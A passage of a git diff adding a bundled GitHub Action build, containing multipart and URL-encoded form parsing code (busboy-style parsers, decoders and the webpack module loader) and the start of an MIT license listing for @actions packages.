&& + RE_BOUNDARY.test(parsedConType[i][0])) { + boundary = parsedConType[i][1] + break + } + } + + function checkFinished () { + if (nends === 0 && finished && !boy._done) { + finished = false + self.end() + } + } + + if (typeof boundary !== 'string') { throw new Error('Multipart: Boundary not found') } + + const fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) + const fileSizeLimit = getLimit(limits, 'fileSize', Infinity) + const filesLimit = getLimit(limits, 'files', Infinity) + const fieldsLimit = getLimit(limits, 'fields', Infinity) + const partsLimit = getLimit(limits, 'parts', Infinity) + const headerPairsLimit = getLimit(limits, 'headerPairs', 2000) + const headerSizeLimit = getLimit(limits, 'headerSize', 80 * 1024) + + let nfiles = 0 + let nfields = 0 + let nends = 0 + let curFile + let curField + let finished = false + + this._needDrain = false + this._pause = false + this._cb = undefined + this._nparts = 0 + this._boy = boy + + const parserCfg = { + boundary, + maxHeaderPairs: headerPairsLimit, + maxHeaderSize: headerSizeLimit, + partHwm: fileOpts.highWaterMark, + highWaterMark: cfg.highWaterMark + } + + this.parser = new Dicer(parserCfg) + this.parser.on('drain', function () { + self._needDrain = false + if (self._cb && !self._pause) { + const cb = self._cb + self._cb = undefined + cb() + } + }).on('part', function onPart (part) { + if (++self._nparts > partsLimit) { + self.parser.removeListener('part', onPart) + self.parser.on('part', skipPart) + boy.hitPartsLimit = true + boy.emit('partsLimit') + return skipPart(part) + } + + // hack because streams2 _always_ doesn't emit 'end' until nextTick, so let + // us emit 'end' early since we know the part has ended if we are already + // seeing the next part + if (curField) { + const field = curField + field.emit('end') + field.removeAllListeners('end') + } + + part.on('header', function (header) { + let contype + let fieldname + let parsed + let charset + let encoding + let filename + let nsize = 0 + + if (header['content-type']) { + parsed = parseParams(header['content-type'][0]) + if (parsed[0]) { + contype = parsed[0].toLowerCase() + for (i = 0, len = parsed.length; i < len; ++i) { + if (RE_CHARSET.test(parsed[i][0])) { + charset = parsed[i][1].toLowerCase() + break + } + } + } + } + + if (contype === undefined) { contype = 'text/plain' } + if (charset === undefined) { charset = defCharset } + + if (header['content-disposition']) { + parsed = parseParams(header['content-disposition'][0]) + if (!RE_FIELD.test(parsed[0])) { return skipPart(part) } + for (i = 0, len = parsed.length; i < len; ++i) { + if (RE_NAME.test(parsed[i][0])) { + fieldname = parsed[i][1] + } else if (RE_FILENAME.test(parsed[i][0])) { + filename = parsed[i][1] + if (!preservePath) { filename = basename(filename) } + } + } + } else { return skipPart(part) } + + if (header['content-transfer-encoding']) { encoding = header['content-transfer-encoding'][0].toLowerCase() } else { encoding = '7bit' } + + let onData, + onEnd + + if (isPartAFile(fieldname, contype, filename)) { + // file/binary field + if (nfiles === filesLimit) { + if (!boy.hitFilesLimit) { + boy.hitFilesLimit = true + boy.emit('filesLimit') + } + return skipPart(part) + } + + ++nfiles + + if (!boy._events.file) { + self.parser._ignore() + return + } + + ++nends + const file = new FileStream(fileOpts) + curFile = file + file.on('end', function () { + --nends + self._pause = false + checkFinished() + if (self._cb && !self._needDrain) { + const cb = self._cb + self._cb = undefined + cb() + } + }) + file._read = function (n) { + if (!self._pause) { return } + self._pause = false + if (self._cb && !self._needDrain) { + const cb = self._cb + self._cb = undefined + cb() + } + } + boy.emit('file', fieldname, file, filename, encoding, contype) + + onData = function (data) { + if ((nsize += data.length) > fileSizeLimit) { + const extralen = fileSizeLimit - nsize + data.length + if (extralen > 0) { file.push(data.slice(0, extralen)) } + file.truncated = true + file.bytesRead = fileSizeLimit + part.removeAllListeners('data') + file.emit('limit') + return + } else if (!file.push(data)) { self._pause = true } + + file.bytesRead = nsize + } + + onEnd = function () { + curFile = undefined + file.push(null) + } + } else { + // non-file field + if (nfields === fieldsLimit) { + if (!boy.hitFieldsLimit) { + boy.hitFieldsLimit = true + boy.emit('fieldsLimit') + } + return skipPart(part) + } + + ++nfields + ++nends + let buffer = '' + let truncated = false + curField = part + + onData = function (data) { + if ((nsize += data.length) > fieldSizeLimit) { + const extralen = (fieldSizeLimit - (nsize - data.length)) + buffer += data.toString('binary', 0, extralen) + truncated = true + part.removeAllListeners('data') + } else { buffer += data.toString('binary') } + } + + onEnd = function () { + curField = undefined + if (buffer.length) { buffer = decodeText(buffer, 'binary', charset) } + boy.emit('field', fieldname, buffer, false, truncated, encoding, contype) + --nends + checkFinished() + } + } + + /* As of node@2efe4ab761666 (v0.10.29+/v0.11.14+), busboy had become + broken. Streams2/streams3 is a huge black box of confusion, but + somehow overriding the sync state seems to fix things again (and still + seems to work for previous node versions). + */ + part._readableState.sync = false + + part.on('data', onData) + part.on('end', onEnd) + }).on('error', function (err) { + if (curFile) { curFile.emit('error', err) } + }) + }).on('error', function (err) { + boy.emit('error', err) + }).on('finish', function () { + finished = true + checkFinished() + }) +} + +Multipart.prototype.write = function (chunk, cb) { + const r = this.parser.write(chunk) + if (r && !this._pause) { + cb() + } else { + this._needDrain = !r + this._cb = cb + } +} + +Multipart.prototype.end = function () { + const self = this + + if (self.parser.writable) { + self.parser.end() + } else if (!self._boy._done) { + process.nextTick(function () { + self._boy._done = true + self._boy.emit('finish') + }) + } +} + +function skipPart (part) { + part.resume() +} + +function FileStream (opts) { + Readable.call(this, opts) + + this.bytesRead = 0 + + this.truncated = false +} + +inherits(FileStream, Readable) + +FileStream.prototype._read = function (n) {} + +module.exports = Multipart + + +/***/ }), + +/***/ 8306: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Decoder = __nccwpck_require__(7100) +const decodeText = __nccwpck_require__(4619) +const getLimit = __nccwpck_require__(1467) + +const RE_CHARSET = /^charset$/i + +UrlEncoded.detect = /^application\/x-www-form-urlencoded/i +function UrlEncoded (boy, cfg) { + const limits = cfg.limits + const parsedConType = cfg.parsedConType + this.boy = boy + + this.fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) + this.fieldNameSizeLimit = getLimit(limits, 'fieldNameSize', 100) + this.fieldsLimit = getLimit(limits, 'fields', Infinity) + + let charset + for (var i = 0, len = parsedConType.length; i < len; ++i) { // eslint-disable-line no-var + if (Array.isArray(parsedConType[i]) && + RE_CHARSET.test(parsedConType[i][0])) { + charset = parsedConType[i][1].toLowerCase() + break + } + } + + if (charset === undefined) { charset = cfg.defCharset || 'utf8' } + + this.decoder = new Decoder() + this.charset = charset + this._fields = 0 + this._state = 'key' + this._checkingBytes = true + this._bytesKey = 0 + this._bytesVal = 0 + this._key = '' + this._val = '' + this._keyTrunc = false + this._valTrunc = false + this._hitLimit = false +} + +UrlEncoded.prototype.write = function (data, cb) { + if (this._fields === this.fieldsLimit) { + if (!this.boy.hitFieldsLimit) { + this.boy.hitFieldsLimit = true + this.boy.emit('fieldsLimit') + } + return cb() + } + + let idxeq; let idxamp; let i; let p = 0; const len = data.length + + while (p < len) { + if (this._state === 'key') { + idxeq = idxamp = undefined + for (i = p; i < len; ++i) { + if (!this._checkingBytes) { ++p } + if (data[i] === 0x3D/* = */) { + idxeq = i + break + } else if (data[i] === 0x26/* & */) { + idxamp = i + break + } + if (this._checkingBytes && this._bytesKey === this.fieldNameSizeLimit) { + this._hitLimit = true + break + } else if (this._checkingBytes) { ++this._bytesKey } + } + + if (idxeq !== undefined) { + // key with assignment + if (idxeq > p) { this._key += this.decoder.write(data.toString('binary', p, idxeq)) } + this._state = 'val' + + this._hitLimit = false + this._checkingBytes = true + this._val = '' + this._bytesVal = 0 + this._valTrunc = false + this.decoder.reset() + + p = idxeq + 1 + } else if (idxamp !== undefined) { + // key with no assignment + ++this._fields + let key; const keyTrunc = this._keyTrunc + if (idxamp > p) { key = (this._key += this.decoder.write(data.toString('binary', p, idxamp))) } else { key = this._key } + + this._hitLimit = false + this._checkingBytes = true + this._key = '' + this._bytesKey = 0 + this._keyTrunc = false + this.decoder.reset() + + if (key.length) { + this.boy.emit('field', decodeText(key, 'binary', this.charset), + '', + keyTrunc, + false) + } + + p = idxamp + 1 + if (this._fields === this.fieldsLimit) { return cb() } + } else if (this._hitLimit) { + // we may not have hit the actual limit if there are encoded bytes... + if (i > p) { this._key += this.decoder.write(data.toString('binary', p, i)) } + p = i + if ((this._bytesKey = this._key.length) === this.fieldNameSizeLimit) { + // yep, we actually did hit the limit + this._checkingBytes = false + this._keyTrunc = true + } + } else { + if (p < len) { this._key += this.decoder.write(data.toString('binary', p)) } + p = len + } + } else { + idxamp = undefined + for (i = p; i < len; ++i) { + if (!this._checkingBytes) { ++p } + if (data[i] === 0x26/* & */) { + idxamp = i + break + } + if (this._checkingBytes && this._bytesVal === this.fieldSizeLimit) { + this._hitLimit = true + break + } else if (this._checkingBytes) { ++this._bytesVal } + } + + if (idxamp !== undefined) { + ++this._fields + if (idxamp > p) { this._val += this.decoder.write(data.toString('binary', p, idxamp)) } + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + decodeText(this._val, 'binary', this.charset), + this._keyTrunc, + this._valTrunc) + this._state = 'key' + + this._hitLimit = false + this._checkingBytes = true + this._key = '' + this._bytesKey = 0 + this._keyTrunc = false + this.decoder.reset() + + p = idxamp + 1 + if (this._fields === this.fieldsLimit) { return cb() } + } else if (this._hitLimit) { + // we may not have hit the actual limit if there are encoded bytes... + if (i > p) { this._val += this.decoder.write(data.toString('binary', p, i)) } + p = i + if ((this._val === '' && this.fieldSizeLimit === 0) || + (this._bytesVal = this._val.length) === this.fieldSizeLimit) { + // yep, we actually did hit the limit + this._checkingBytes = false + this._valTrunc = true + } + } else { + if (p < len) { this._val += this.decoder.write(data.toString('binary', p)) } + p = len + } + } + } + cb() +} + +UrlEncoded.prototype.end = function () { + if (this.boy._done) { return } + + if (this._state === 'key' && this._key.length > 0) { + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + '', + this._keyTrunc, + false) + } else if (this._state === 'val') { + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + decodeText(this._val, 'binary', this.charset), + this._keyTrunc, + this._valTrunc) + } + this.boy._done = true + this.boy.emit('finish') +} + +module.exports = UrlEncoded + + +/***/ }), + +/***/ 7100: +/***/ ((module) => { + +"use strict"; + + +const RE_PLUS = /\+/g + +const HEX = [ + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 +] + +function Decoder () { + this.buffer = undefined +} +Decoder.prototype.write = function (str) { + // Replace '+' with ' ' before decoding + str = str.replace(RE_PLUS, ' ') + let res = '' + let i = 0; let p = 0; const len = str.length + for (; i < len; ++i) { + if (this.buffer !== undefined) { + if (!HEX[str.charCodeAt(i)]) { + res += '%' + this.buffer + this.buffer = undefined + --i // retry character + } else { + this.buffer += str[i] + ++p + if (this.buffer.length === 2) { + res += String.fromCharCode(parseInt(this.buffer, 16)) + this.buffer = undefined + } + } + } else if (str[i] === '%') { + if (i > p) { + res += str.substring(p, i) + p = i + } + this.buffer = '' + ++p + } + } + if (p < len && this.buffer === undefined) { res += str.substring(p) } + return res +} +Decoder.prototype.reset = function () { + this.buffer = undefined +} + +module.exports = Decoder + + +/***/ }), + +/***/ 8647: +/***/ ((module) => { + +"use strict"; + + +module.exports = function basename (path) { + if (typeof path !== 'string') { return '' } + for (var i = path.length - 1; i >= 0; --i) { // eslint-disable-line no-var + switch (path.charCodeAt(i)) { + case 0x2F: // '/' + case 0x5C: // '\' + path = path.slice(i + 1) + return (path === '..' || path === '.' ? '' : path) + } + } + return (path === '..' || path === '.' ? '' : path) +} + + +/***/ }), + +/***/ 4619: +/***/ (function(module) { + +"use strict"; + + +// Node has always utf-8 +const utf8Decoder = new TextDecoder('utf-8') +const textDecoders = new Map([ + ['utf-8', utf8Decoder], + ['utf8', utf8Decoder] +]) + +function getDecoder (charset) { + let lc + while (true) { + switch (charset) { + case 'utf-8': + case 'utf8': + return decoders.utf8 + case 'latin1': + case 'ascii': // TODO: Make these a separate, strict decoder? + case 'us-ascii': + case 'iso-8859-1': + case 'iso8859-1': + case 'iso88591': + case 'iso_8859-1': + case 'windows-1252': + case 'iso_8859-1:1987': + case 'cp1252': + case 'x-cp1252': + return decoders.latin1 + case 'utf16le': + case 'utf-16le': + case 'ucs2': + case 'ucs-2': + return decoders.utf16le + case 'base64': + return decoders.base64 + default: + if (lc === undefined) { + lc = true + charset = charset.toLowerCase() + continue + } + return decoders.other.bind(charset) + } + } +} + +const decoders = { + utf8: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.utf8Slice(0, data.length) + }, + + latin1: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + return data + } + return data.latin1Slice(0, data.length) + }, + + utf16le: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.ucs2Slice(0, data.length) + }, + + base64: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.base64Slice(0, data.length) + }, + + other: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + + if (textDecoders.has(this.toString())) { + try { + return textDecoders.get(this).decode(data) + } catch (e) { } + } + return typeof data === 'string' + ? data + : data.toString() + } +} + +function decodeText (text, sourceEncoding, destEncoding) { + if (text) { + return getDecoder(destEncoding)(text, sourceEncoding) + } + return text +} + +module.exports = decodeText + + +/***/ }), + +/***/ 1467: +/***/ ((module) => { + +"use strict"; + + +module.exports = function getLimit (limits, name, defaultLimit) { + if ( + !limits || + limits[name] === undefined || + limits[name] === null + ) { return defaultLimit } + + if ( + typeof limits[name] !== 'number' || + isNaN(limits[name]) + ) { throw new TypeError('Limit ' + name + ' is not a valid number') } + + return limits[name] +} + + +/***/ }), + +/***/ 1854: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +/* eslint-disable object-property-newline */ + + +const decodeText = __nccwpck_require__(4619) + +const RE_ENCODED = /%[a-fA-F0-9][a-fA-F0-9]/g + +const EncodedLookup = { + '%00': '\x00', '%01': '\x01', '%02': '\x02', '%03': '\x03', '%04': '\x04', + '%05': '\x05', '%06': '\x06', '%07': '\x07', '%08': '\x08', '%09': '\x09', + '%0a': '\x0a', '%0A': '\x0a', '%0b': '\x0b', '%0B': '\x0b', '%0c': '\x0c', + '%0C': '\x0c', '%0d': '\x0d', '%0D': '\x0d', '%0e': '\x0e', '%0E': '\x0e', + '%0f': '\x0f', '%0F': '\x0f', '%10': '\x10', '%11': '\x11', '%12': '\x12', + '%13': '\x13', '%14': '\x14', '%15': '\x15', '%16': '\x16', '%17': '\x17', + '%18': '\x18', '%19': '\x19', '%1a': '\x1a', '%1A': '\x1a', '%1b': '\x1b', + '%1B': '\x1b', '%1c': '\x1c', '%1C': '\x1c', '%1d': '\x1d', '%1D': '\x1d', + '%1e': '\x1e', '%1E': '\x1e', '%1f': '\x1f', '%1F': '\x1f', '%20': '\x20', + '%21': '\x21', '%22': '\x22', '%23': '\x23', '%24': '\x24', '%25': '\x25', + '%26': '\x26', '%27': '\x27', '%28': '\x28', '%29': '\x29', '%2a': '\x2a', + '%2A': '\x2a', '%2b': '\x2b', '%2B': '\x2b', '%2c': '\x2c', '%2C': '\x2c', + '%2d': '\x2d', '%2D': '\x2d', '%2e': '\x2e', '%2E': '\x2e', '%2f': '\x2f', + '%2F': '\x2f', '%30': '\x30', '%31': '\x31', '%32': '\x32', '%33': '\x33', + '%34': '\x34', '%35': '\x35', '%36': '\x36', '%37': '\x37', '%38': '\x38', + '%39': '\x39', '%3a': '\x3a', '%3A': '\x3a', '%3b': '\x3b', '%3B': '\x3b', + '%3c': '\x3c', '%3C': '\x3c', '%3d': '\x3d', '%3D': '\x3d', '%3e': '\x3e', + '%3E': '\x3e', '%3f': '\x3f', '%3F': '\x3f', '%40': '\x40', '%41': '\x41', + '%42': '\x42', '%43': '\x43', '%44': '\x44', '%45': '\x45', '%46': '\x46', + '%47': '\x47', '%48': '\x48', '%49': '\x49', '%4a': '\x4a', '%4A': '\x4a', + '%4b': '\x4b', '%4B': '\x4b', '%4c': '\x4c', '%4C': '\x4c', '%4d': '\x4d', + '%4D': '\x4d', '%4e': '\x4e', '%4E': '\x4e', '%4f': '\x4f', '%4F': '\x4f', + '%50': '\x50', '%51': '\x51', '%52': '\x52', '%53': '\x53', '%54': '\x54', + '%55': '\x55', '%56': '\x56', '%57': '\x57', '%58': '\x58', '%59': '\x59', + '%5a': '\x5a', '%5A': '\x5a', '%5b': '\x5b', '%5B': '\x5b', '%5c': '\x5c', + '%5C': '\x5c', '%5d': '\x5d', '%5D': '\x5d', '%5e': '\x5e', '%5E': '\x5e', + '%5f': '\x5f', '%5F': '\x5f', '%60': '\x60', '%61': '\x61', '%62': '\x62', + '%63': '\x63', '%64': '\x64', '%65': '\x65', '%66': '\x66', '%67': '\x67', + '%68': '\x68', '%69': '\x69', '%6a': '\x6a', '%6A': '\x6a', '%6b': '\x6b', + '%6B': '\x6b', '%6c': '\x6c', '%6C': '\x6c', '%6d': '\x6d', '%6D': '\x6d', + '%6e': '\x6e', '%6E': '\x6e', '%6f': '\x6f', '%6F': '\x6f', '%70': '\x70', + '%71': '\x71', '%72': '\x72', '%73': '\x73', '%74': '\x74', '%75': '\x75', + '%76': '\x76', '%77': '\x77', '%78': '\x78', '%79': '\x79', '%7a': '\x7a', + '%7A': '\x7a', '%7b': '\x7b', '%7B': '\x7b', '%7c': '\x7c', '%7C': '\x7c', + '%7d': '\x7d', '%7D': '\x7d', '%7e': '\x7e', '%7E': '\x7e', '%7f': '\x7f', + '%7F': '\x7f', '%80': '\x80', '%81': '\x81', '%82': '\x82', '%83': '\x83', + '%84': '\x84', '%85': '\x85', '%86': '\x86', '%87': '\x87', '%88': '\x88', + '%89': '\x89', '%8a': '\x8a', '%8A': '\x8a', '%8b': '\x8b', '%8B': '\x8b', + '%8c': '\x8c', '%8C': '\x8c', '%8d': '\x8d', '%8D': '\x8d', '%8e': '\x8e', + '%8E': '\x8e', '%8f': '\x8f', '%8F': '\x8f', '%90': '\x90', '%91': '\x91', + '%92': '\x92', '%93': '\x93', '%94': '\x94', '%95': '\x95', '%96': '\x96', + '%97': '\x97', '%98': '\x98', '%99': '\x99', '%9a': '\x9a', '%9A': '\x9a', + '%9b': '\x9b', '%9B': '\x9b', '%9c': '\x9c', '%9C': '\x9c', '%9d': '\x9d', + '%9D': '\x9d', '%9e': '\x9e', '%9E': '\x9e', '%9f': '\x9f', '%9F': '\x9f', + '%a0': '\xa0', '%A0': '\xa0', '%a1': '\xa1', '%A1': '\xa1', '%a2': '\xa2', + '%A2': '\xa2', '%a3': '\xa3', '%A3': '\xa3', '%a4': '\xa4', '%A4': '\xa4', + '%a5': '\xa5', '%A5': '\xa5', '%a6': '\xa6', '%A6': '\xa6', '%a7': '\xa7', + '%A7': '\xa7', '%a8': '\xa8', '%A8': '\xa8', '%a9': '\xa9', '%A9': '\xa9', + '%aa': '\xaa', '%Aa': '\xaa', '%aA': '\xaa', '%AA': '\xaa', '%ab': '\xab', + '%Ab': '\xab', '%aB': '\xab', '%AB': '\xab', '%ac': '\xac', '%Ac': '\xac', + '%aC': '\xac', '%AC': '\xac', '%ad': '\xad', '%Ad': '\xad', '%aD': '\xad', + '%AD': '\xad', '%ae': '\xae', '%Ae': '\xae', '%aE': '\xae', '%AE': '\xae', + '%af': '\xaf', '%Af': '\xaf', '%aF': '\xaf', '%AF': '\xaf', '%b0': '\xb0', + '%B0': '\xb0', '%b1': '\xb1', '%B1': '\xb1', '%b2': '\xb2', '%B2': '\xb2', + '%b3': '\xb3', '%B3': '\xb3', '%b4': '\xb4', '%B4': '\xb4', '%b5': '\xb5', + '%B5': '\xb5', '%b6': '\xb6', '%B6': '\xb6', '%b7': '\xb7', '%B7': '\xb7', + '%b8': '\xb8', '%B8': '\xb8', '%b9': '\xb9', '%B9': '\xb9', '%ba': '\xba', + '%Ba': '\xba', '%bA': '\xba', '%BA': '\xba', '%bb': '\xbb', '%Bb': '\xbb', + '%bB': '\xbb', '%BB': '\xbb', '%bc': '\xbc', '%Bc': '\xbc', '%bC': '\xbc', + '%BC': '\xbc', '%bd': '\xbd', '%Bd': '\xbd', '%bD': '\xbd', '%BD': '\xbd', + '%be': '\xbe', '%Be': '\xbe', '%bE': '\xbe', '%BE': '\xbe', '%bf': '\xbf', + '%Bf': '\xbf', '%bF': '\xbf', '%BF': '\xbf', '%c0': '\xc0', '%C0': '\xc0', + '%c1': '\xc1', '%C1': '\xc1', '%c2': '\xc2', '%C2': '\xc2', '%c3': '\xc3', + '%C3': '\xc3', '%c4': '\xc4', '%C4': '\xc4', '%c5': '\xc5', '%C5': '\xc5', + '%c6': '\xc6', '%C6': '\xc6', '%c7': '\xc7', '%C7': '\xc7', '%c8': '\xc8', + '%C8': '\xc8', '%c9': '\xc9', '%C9': '\xc9', '%ca': '\xca', '%Ca': '\xca', + '%cA': '\xca', '%CA': '\xca', '%cb': '\xcb', '%Cb': '\xcb', '%cB': '\xcb', + '%CB': '\xcb', '%cc': '\xcc', '%Cc': '\xcc', '%cC': '\xcc', '%CC': '\xcc', + '%cd': '\xcd', '%Cd': '\xcd', '%cD': '\xcd', '%CD': '\xcd', '%ce': '\xce', + '%Ce': '\xce', '%cE': '\xce', '%CE': '\xce', '%cf': '\xcf', '%Cf': '\xcf', + '%cF': '\xcf', '%CF': '\xcf', '%d0': '\xd0', '%D0': '\xd0', '%d1': '\xd1', + '%D1': '\xd1', '%d2': '\xd2', '%D2': '\xd2', '%d3': '\xd3', '%D3': '\xd3', + '%d4': '\xd4', '%D4': '\xd4', '%d5': '\xd5', '%D5': '\xd5', '%d6': '\xd6', + '%D6': '\xd6', '%d7': '\xd7', '%D7': '\xd7', '%d8': '\xd8', '%D8': '\xd8', + '%d9': '\xd9', '%D9': '\xd9', '%da': '\xda', '%Da': '\xda', '%dA': '\xda', + '%DA': '\xda', '%db': '\xdb', '%Db': '\xdb', '%dB': '\xdb', '%DB': '\xdb', + '%dc': '\xdc', '%Dc': '\xdc', '%dC': '\xdc', '%DC': '\xdc', '%dd': '\xdd', + '%Dd': '\xdd', '%dD': '\xdd', '%DD': '\xdd', '%de': '\xde', '%De': '\xde', + '%dE': '\xde', '%DE': '\xde', '%df': '\xdf', '%Df': '\xdf', '%dF': '\xdf', + '%DF': '\xdf', '%e0': '\xe0', '%E0': '\xe0', '%e1': '\xe1', '%E1': '\xe1', + '%e2': '\xe2', '%E2': '\xe2', '%e3': '\xe3', '%E3': '\xe3', '%e4': '\xe4', + '%E4': '\xe4', '%e5': '\xe5', '%E5': '\xe5', '%e6': '\xe6', '%E6': '\xe6', + '%e7': '\xe7', '%E7': '\xe7', '%e8': '\xe8', '%E8': '\xe8', '%e9': '\xe9', + '%E9': '\xe9', '%ea': '\xea', '%Ea': '\xea', '%eA': '\xea', '%EA': '\xea', + '%eb': '\xeb', '%Eb': '\xeb', '%eB': '\xeb', '%EB': '\xeb', '%ec': '\xec', + '%Ec': '\xec', '%eC': '\xec', '%EC': '\xec', '%ed': '\xed', '%Ed': '\xed', + '%eD': '\xed', '%ED': '\xed', '%ee': '\xee', '%Ee': '\xee', '%eE': '\xee', + '%EE': '\xee', '%ef': '\xef', '%Ef': '\xef', '%eF': '\xef', '%EF': '\xef', + '%f0': '\xf0', '%F0': '\xf0', '%f1': '\xf1', '%F1': '\xf1', '%f2': '\xf2', + '%F2': '\xf2', '%f3': '\xf3', '%F3': '\xf3', '%f4': '\xf4', '%F4': '\xf4', + '%f5': '\xf5', '%F5': '\xf5', '%f6': '\xf6', '%F6': '\xf6', '%f7': '\xf7', + '%F7': '\xf7', '%f8': '\xf8', '%F8': '\xf8', '%f9': '\xf9', '%F9': '\xf9', + '%fa': '\xfa', '%Fa': '\xfa', '%fA': '\xfa', '%FA': '\xfa', '%fb': '\xfb', + '%Fb': '\xfb', '%fB': '\xfb', '%FB': '\xfb', '%fc': '\xfc', '%Fc': '\xfc', + '%fC': '\xfc', '%FC': '\xfc', '%fd': '\xfd', '%Fd': '\xfd', '%fD': '\xfd', + '%FD': '\xfd', '%fe': '\xfe', '%Fe': '\xfe', '%fE': '\xfe', '%FE': '\xfe', + '%ff': '\xff', '%Ff': '\xff', '%fF': '\xff', '%FF': '\xff' +} + +function encodedReplacer (match) { + return EncodedLookup[match] +} + +const STATE_KEY = 0 +const STATE_VALUE = 1 +const STATE_CHARSET = 2 +const STATE_LANG = 3 + +function parseParams (str) { + const res = [] + let state = STATE_KEY + let charset = '' + let inquote = false + let escaping = false + let p = 0 + let tmp = '' + const len = str.length + + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + const char = str[i] + if (char === '\\' && inquote) { + if (escaping) { escaping = false } else { + escaping = true + continue + } + } else if (char === '"') { + if (!escaping) { + if (inquote) { + inquote = false + state = STATE_KEY + } else { inquote = true } + continue + } else { escaping = false } + } else { + if (escaping && inquote) { tmp += '\\' } + escaping = false + if ((state === STATE_CHARSET || state === STATE_LANG) && char === "'") { + if (state === STATE_CHARSET) { + state = STATE_LANG + charset = tmp.substring(1) + } else { state = STATE_VALUE } + tmp = '' + continue + } else if (state === STATE_KEY && + (char === '*' || char === '=') && + res.length) { + state = char === '*' + ? STATE_CHARSET + : STATE_VALUE + res[p] = [tmp, undefined] + tmp = '' + continue + } else if (!inquote && char === ';') { + state = STATE_KEY + if (charset) { + if (tmp.length) { + tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), + 'binary', + charset) + } + charset = '' + } else if (tmp.length) { + tmp = decodeText(tmp, 'binary', 'utf8') + } + if (res[p] === undefined) { res[p] = tmp } else { res[p][1] = tmp } + tmp = '' + ++p + continue + } else if (!inquote && (char === ' ' || char === '\t')) { continue } + } + tmp += char + } + if (charset && tmp.length) { + tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), + 'binary', + charset) + } else if (tmp) { + tmp = decodeText(tmp, 'binary', 'utf8') + } + + if (res[p] === undefined) { + if (tmp) { res[p] = tmp } + } else { res[p][1] = tmp } + + return res +} + +module.exports = parseParams + + +/***/ }) + +/******/ }); +/************************************************************************/ +/******/ // The module cache +/******/ var __webpack_module_cache__ = {}; +/******/ +/******/ // The require function +/******/ function __nccwpck_require__(moduleId) { +/******/ // Check if module is in cache +/******/ var cachedModule = __webpack_module_cache__[moduleId]; +/******/ if (cachedModule !== undefined) { +/******/ return cachedModule.exports; +/******/ } +/******/ // Create a new module (and put it into the cache) +/******/ var module = __webpack_module_cache__[moduleId] = { +/******/ // no module.id needed +/******/ // no module.loaded needed +/******/ exports: {} +/******/ }; +/******/ +/******/ // Execute the module function +/******/ var threw = true; +/******/ try { +/******/ __webpack_modules__[moduleId].call(module.exports, module, module.exports, __nccwpck_require__); +/******/ threw = false; +/******/ } finally { +/******/ if(threw) delete __webpack_module_cache__[moduleId]; +/******/ } +/******/ +/******/ // Return the exports of the module +/******/ return module.exports; +/******/ } +/******/ +/************************************************************************/ +/******/ /* webpack/runtime/compat */ +/******/ +/******/ if (typeof __nccwpck_require__ !== 'undefined') __nccwpck_require__.ab = __dirname + "/"; +/******/ +/************************************************************************/ +/******/ +/******/ // startup +/******/ // Load entry module and return exports +/******/ // This entry module is referenced by other modules so it can't be inlined +/******/ var __webpack_exports__ = __nccwpck_require__(6144); +/******/ module.exports = __webpack_exports__; +/******/ +/******/ })() +; \ No newline at end of file diff --git a/.github/action/dist/licenses.txt b/.github/action/dist/licenses.txt new file mode 100644 index 00000000000..cd36a2d85ef --- /dev/null +++ b/.github/action/dist/licenses.txt @@ -0,0 +1,175 @@ +@actions/core +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/exec +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS 